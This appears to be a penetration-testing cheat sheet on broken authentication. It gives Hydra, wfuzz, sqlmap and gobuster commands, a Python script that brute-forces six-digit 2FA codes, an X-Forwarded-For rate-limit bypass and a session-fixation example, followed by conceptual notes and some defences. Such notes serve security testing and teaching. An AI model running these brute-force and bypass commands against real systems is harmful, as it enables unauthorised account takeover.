Broken Authentication

User Enumeration

Using Nmap (Replace target.com and port with your target)

nmap -p <port> --script http-enum-users.nse target.com

Using Wfuzz (Replace USERNAME_LIST with a wordlist)

wfuzz -c -z file,USERNAME_LIST -w target.com/login?username=FUZZ

Brute-Forcing Passwords

Using Hydra (Replace username, password_list, and target)

hydra -l username -P password_list target.com http-post-form "/login.php:username=^USER^&password=^PASS^:Invalid username or password"

Using Hashcat (For Offline Password Cracking)

hashcat -m <hash_type> <hash_file> <wordlist>

Brute-Forcing Password Reset Tokens

Using Wfuzz (Replace TOKEN_LIST)

wfuzz -c -z file,TOKEN_LIST target.com/reset?token=FUZZ

Brute-Forcing 2FA Codes

Using a Custom Script (Python Example)

import itertools
import requests

url = "https://target.com/2fa"
headers = {"Content-Type": "application/json"}

for code in itertools.product("0123456789", repeat=6):
    payload = {"otp": "".join(code)}
    response = requests.post(url, json=payload, headers=headers)
    if "success" in response.text:
        print("Valid 2FA Code Found:", "".join(code))
        break

Bypassing Brute-Force Protection (X-Forwarded-For)

Using Curl (Modify Headers)

curl -H "X-Forwarded-For: 1.2.3.4" target.com/login

Session Attacks

Brute-Forcing Cookies (Using Wfuzz, Very Time Consuming)

(Replace COOKIE_LIST)

wfuzz -c -b "sessionid=FUZZ" target.com/protected_page -z file,COOKIE_LIST

Example of Session Fixation

Attacker Sets Session ID:

curl -b "sessionid=attacker_session_id" target.com

Then coerces the victim to use that same session ID.

Additional Examples

Nmap Scan

nmap -sV -sC target.com # Version and default scripts.

Directory Brute Force

gobuster dir -u target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

SQLMap Scan

sqlmap -u "target.com/page.php?id=1" --dbs # Database Enumeration

Nikto Scan

nikto -h target.com

Burp Suite Intruder Attack for Fuzzing

Burp Suite is a GUI tool but provides many command-line options.

Categories of Authentication

Knowledge

  • Passwords, PINs, Security Questions.

  • Password complexity policies, password storage (hashing, salting), and password managers.

Ownership

  • ID Cards, TOTP (Time-based One-Time Password), Hardware Tokens.

  • The TOTP algorithm, U2F/FIDO2 keys, and smart cards.

Inherence

  • Biometric Authentication (Fingerprint, Facial Recognition, Iris Scan).

  • Accuracy and security of different biometric methods, vulnerabilities like spoofing.

Brute-Force Attacks

User Enumeration

  • Identifying valid usernames.

  • Common techniques include response time analysis, error message analysis, and social engineering.

Brute-Forcing Passwords

  • Trying multiple password combinations.

  • Dictionary attacks, hybrid attacks, and rainbow table attacks. Tools like Hydra and Hashcat.

Brute-Forcing Password Reset Tokens

  • Trying different reset token values.

  • Weak or predictable token generation exploitation.

Brute-Forcing 2FA Codes

  • Trying many 2FA code combinations.

  • Time window vulnerabilities, rate limiting importance.

Bypassing Brute-Force Protection

Rate Limit

  • X-Forwarded-For HTTP Header Manipulation.

  • Other header manipulations and distributed brute-force attacks.

CAPTCHAs

  • Looking for CAPTCHA solutions in HTML code.

  • CAPTCHA bypass techniques and machine learning for solving.

Password Attacks

Default Credentials

Vulnerable Password Reset

  • Issues: Guessable security questions, username injection in reset requests.

  • Importance of strong security questions and robust reset mechanisms.

Authentication Bypasses

Accessing Protected Pages Directly

  • Improper access control vulnerabilities.

Manipulating HTTP Parameters

  • Parameter tampering and SQL injection.

Session Attacks

Brute-Forcing Cookies with Insufficient Entropy

  • Importance of cryptographically secure session ID generation.

Session Fixation

  1. Attacker obtains a valid session identifier.

  2. Attacker coerces the victim to use this session identifier (social engineering).

  3. Victim authenticates to the vulnerable web application.

  4. Attacker hijacks the victim's session.

  • Prevention: Regenerating session IDs after login.

Improper Session Timeout

  • Sessions should expire after an appropriate time interval.

  • Best practices for session timeout management and secure session storage.

Additional Considerations

  • MFA Implementation Flaws: Weak MFA can lead to vulnerabilities.

  • WAF Bypasses: Attackers may bypass WAFs to exploit authentication vulnerabilities.

  • OAuth/OpenID Connect Vulnerabilities: Misconfigurations can lead to account takeover.

  • JWT Vulnerabilities: Weak validation can result in security issues.

  • SSO Vulnerabilities: Weak SSO implementations can compromise multiple applications.

  • Client-Side Vulnerabilities: Storing sensitive data locally, client-side validation bypasses.

Last updated